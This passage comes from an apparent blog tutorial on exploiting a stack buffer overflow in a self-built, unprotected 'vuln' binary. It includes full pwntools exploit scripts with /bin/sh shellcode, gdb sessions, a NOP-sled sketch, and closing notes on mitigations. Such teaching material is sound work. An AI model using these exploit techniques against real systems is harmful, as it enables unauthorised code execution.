------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |         shellcode          |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |            ...             |
------------------------------     ------------------------------     ------------------------------
|                            |     |                            |     |         shellcode          |
------------------------------     ------------------------------     ------------------------------

Equipped with our initial payload, let's build the exploit. I will use pwntools to help with interacting with the binary, generating shellcode, etc. Here's the code:

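#!/usr/bin/env python3
from pwn import *

# context.binary also sets the target architecture (amd64) used by asm() and shellcraft
context.binary = elf = ELF('./vuln')
p = process('./vuln')

payload  = b"A" * 40                  # fill `name` (32 bytes) and the saved RBP (8 bytes)
payload += p64(0x7fffffffdc30)        # new return address: where the shellcode starts on the stack
payload += asm(shellcraft.sh())       # shellcode that executes /bin/sh

p.sendlineafter(b"your name?", payload)   # wait for the prompt, then send the payload
log.info(p.recvline().decode())
p.interactive()                           # hand the process (hopefully a shell) over to us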

First, we start the process, which is our vuln program. Then, we create our payload, consisting of 40 bytes of filler, the address of the shellcode, and the shellcode itself. In our case, shellcraft.sh() generates shellcode that executes /bin/sh, giving us a shell. Finally, we send our payload to the program's standard input when it asks for our name, and then switch to interactive mode to interact with the process.

Let's run it:

./solve.py

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process './vuln': pid 354685
/usr/lib/python3/dist-packages/pwnlib/tubes/tube.py:876: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
/usr/lib/python3/dist-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] 
[*] Switching to interactive mode
[*] Got EOF while reading in interactive
$ id
[*] Process './vuln' stopped with exit code -11 (SIGSEGV) (pid 354685)
[*] Got EOF while sending in interactive

When the exploit runs, it switches to interactive mode, so in theory, we should now be interacting with the new shell. But it didn't work as we hoped: pwntools reports Got EOF while reading, and when we type the id command, we learn that the process has already exited with a segmentation fault (exit code -11, SIGSEGV).

Luckily for us, pwntools can either attach gdb to a running process or start the program under gdb. Here's how we start the process under gdb from Python:

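#!/usr/bin/env python3
from pwn import *

# context.binary also sets the target architecture (amd64) used by asm() and shellcraft
context.binary = elf = ELF('./vuln')
p = gdb.debug('./vuln')               # start ./vuln under gdbserver and open gdb attached to it

payload  = b"A" * 40                  # fill `name` (32 bytes) and the saved RBP (8 bytes)
payload += p64(0x7fffffffdc30)        # new return address: where the shellcode starts on the stack
payload += asm(shellcraft.sh())       # shellcode that executes /bin/sh

p.sendlineafter(b"your name?", payload)   # wait for the prompt, then send the payload
log.info(p.recvline().decode())
p.interactive()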

So let's investigate what the issue is:

./solve.py

Output:

Reading symbols from ./vuln...
(No debugging symbols found in ./vuln)
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
warning: File transfers from remote targets can be slow. Use "set sysroot" to access files locally instead.
Reading /lib64/ld-linux-x86-64.so.2 from remote target...
0x00007ffff7fe3440 in _start () from target:/lib64/ld-linux-x86-64.so.2
(gdb) b *vuln+47
Breakpoint 1 at 0x401165
(gdb) c
Continuing.
Reading /lib/x86_64-linux-gnu/libc.so.6 from remote target...

Breakpoint 1, 0x0000000000401165 in vuln ()
(gdb) x/6gx $rsp
0x7fffffffdc68: 0x00007fffffffdc30      0x6e69622fb848686a
0x7fffffffdc78: 0xe7894850732f2f2f      0x2434810101697268
0x7fffffffdc88: 0x6a56f63101010101      0x894856e601485e08
(gdb) 

First, notice that pwntools started gdb automatically. Do you remember when I asked you to make a note of the address at which the program crashed (vuln() + 47)? To avoid stepping through the instructions one by one, we simply set a breakpoint at that address (the final ret instruction):

(gdb) b*vuln+47

Then we continue with c.

Once we hit the breakpoint, we inspect the RSP register:

Breakpoint 1, 0x0000000000401165 in vuln ()
(gdb) x/6gx $rsp
0x7fffffffdc68: 0x00007fffffffdc30      0x6e69622fb848686a
0x7fffffffdc78: 0xe7894850732f2f2f      0x2434810101697268
0x7fffffffdc88: 0x6a56f63101010101      0x894856e601485e08

What we see here is that RSP is not 0x7fffffffdc28, as we initially found, but 0x7fffffffdc68. So, let's update our exploit accordingly. Remember that we need the top of the stack + 8 bytes, since ret pops the first value, so the address we want to use is 0x7fffffffdc70, not 0x7fffffffdc68.

Here's the final updated exploit:

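#!/usr/bin/env python3
from pwn import *

# context.binary also sets the target architecture (amd64) used by asm() and shellcraft
context.binary = elf = ELF('./vuln')
p = process('./vuln')

payload  = b"A" * 40                  # fill `name` (32 bytes) and the saved RBP (8 bytes)
payload += p64(0x7fffffffdc70)        # RSP at `ret` as seen via gdb.debug (0x7fffffffdc68) + 8
payload += asm(shellcraft.sh())       # shellcode that executes /bin/sh

p.sendlineafter(b"your name?", payload)   # wait for the prompt, then send the payload
log.info(p.recvline().decode())
p.interactive()                           # interact with the spawned shell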

Let's now re-run our exploit:

./solve.py

Output:

[*] '/home/kali/bof/vanilla/vuln'
    Arch:       amd64-64-little
    RELRO:      Partial RELRO
    Stack:      No canary found
    NX:         NX unknown - GNU_STACK missing
    PIE:        No PIE (0x400000)
    Stack:      Executable
    RWX:        Has RWX segments
    Stripped:   No
[+] Starting local process './vuln': pid 362535
/usr/lib/python3/dist-packages/pwnlib/tubes/tube.py:876: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  res = self.recvuntil(delim, timeout=timeout)
/usr/lib/python3/dist-packages/pwnlib/log.py:396: BytesWarning: Bytes is not text; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes
  self._log(logging.INFO, message, args, kwargs, 'info')
[*] 
[*] Switching to interactive mode
$ id
uid=1000(kali) gid=1000(kali) groups=1000(kali),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),100(users),101(netdev),107(bluetooth),115(scanner),127(lpadmin),135(wireshark),137(kaboxer),138(docker)
$  

Voila! We have a shell back.

At this point, you are (hopefully) wondering: if we disabled ASLR and compiled our program without PIE, why did we have to change the address? The difference in memory layout between running our non-PIE binary under gdb and launching it directly with pwntools (or from the shell) is mainly due to environment handling and gdb's own process setup. Environment variables and the program path are stored at the top of the stack, so any difference in them shifts everything below, including our stack frame. gdb, for example, sets the LINES and COLUMNS environment variables for the program it runs and starts it using its full path (/home/kali/bof/vanilla/vuln rather than ./vuln), which changes the stack layout compared to direct execution, even when ASLR is off and the binary is non-PIE.

Just as a side note, by default, gdb explicitly disables ASLR for its debugging sessions and, as a result, you see fixed, predictable addresses in gdb, but outside gdb (even with ASLR disabled system-wide), there can still be slight differences due to environment or loader invocation details.
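A common way to make such an exploit tolerate small stack shifts, which the exploit in this post does not use, is a NOP sled: a run of nop instructions (0x90) placed before the shellcode, with the return address aimed at the middle of the run, so execution slides into the shellcode wherever it lands inside the sled. Below is a minimal Python sketch of the arithmetic, assuming the 40-byte offset and the 256-byte read() limit of our program; sled_payload, lands_in_sled and the sled length are hypothetical, and the shellcode is a placeholder.

```python
import struct

NOP = b"\x90"
MAX_INPUT = 256   # read(0, name, 256) accepts at most this many bytes


def sled_payload(ret_slot_guess: int, shellcode: bytes, sled_len: int = 160, offset: int = 40):
    """Build filler + target + NOP sled + shellcode, aiming at the middle of the
    sled so the guessed slot may be off by up to sled_len // 2 bytes."""
    target = ret_slot_guess + 8 + sled_len // 2
    payload = b"A" * offset + struct.pack("<Q", target) + NOP * sled_len + shellcode
    if len(payload) > MAX_INPUT:
        raise ValueError(f"payload is {len(payload)} bytes, read() only takes {MAX_INPUT}")
    return payload, target


def lands_in_sled(actual_ret_slot: int, target: int, sled_len: int) -> bool:
    """Would a jump to `target` hit the sled if the real slot is `actual_ret_slot`?"""
    sled_start = actual_ret_slot + 8
    return sled_start <= target < sled_start + sled_len
```

With a 160-byte sled and a 48-byte placeholder shellcode, an address guessed from the first gdb session (0x7fffffffdc28) would still land in the sled when the real slot is 0x7fffffffdc68, 64 bytes higher. The trade-off is that the sled eats into the 256 bytes read() accepts.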

Conclusions (preventing buffer overflow)

Congrats on sticking until the end and going through all that content. I hope it was informative and it dispelled any doubts you might have on this subject.

Now that you know what a buffer overflow is and how it works, have analyzed an example of a stack buffer overflow, and even written your own exploit for it, let's think about how such vulnerabilities can be avoided and what protection mechanisms are at our disposal. Bounds checking, secure coding practices (in our example, simply passing sizeof(name) instead of 256 to read()), and the use of memory-safe languages or compiler features all help reduce buffer overflow risks. Compilers and operating systems also provide defenses such as stack canaries, address space layout randomization (ASLR), and non-executable memory regions (DEP/NX) to mitigate exploitation attempts. However, in this blog series, we will explore how to bypass these mitigation mechanisms to gain code execution on an application vulnerable to a buffer overflow. We will start with DEP, so stay tuned.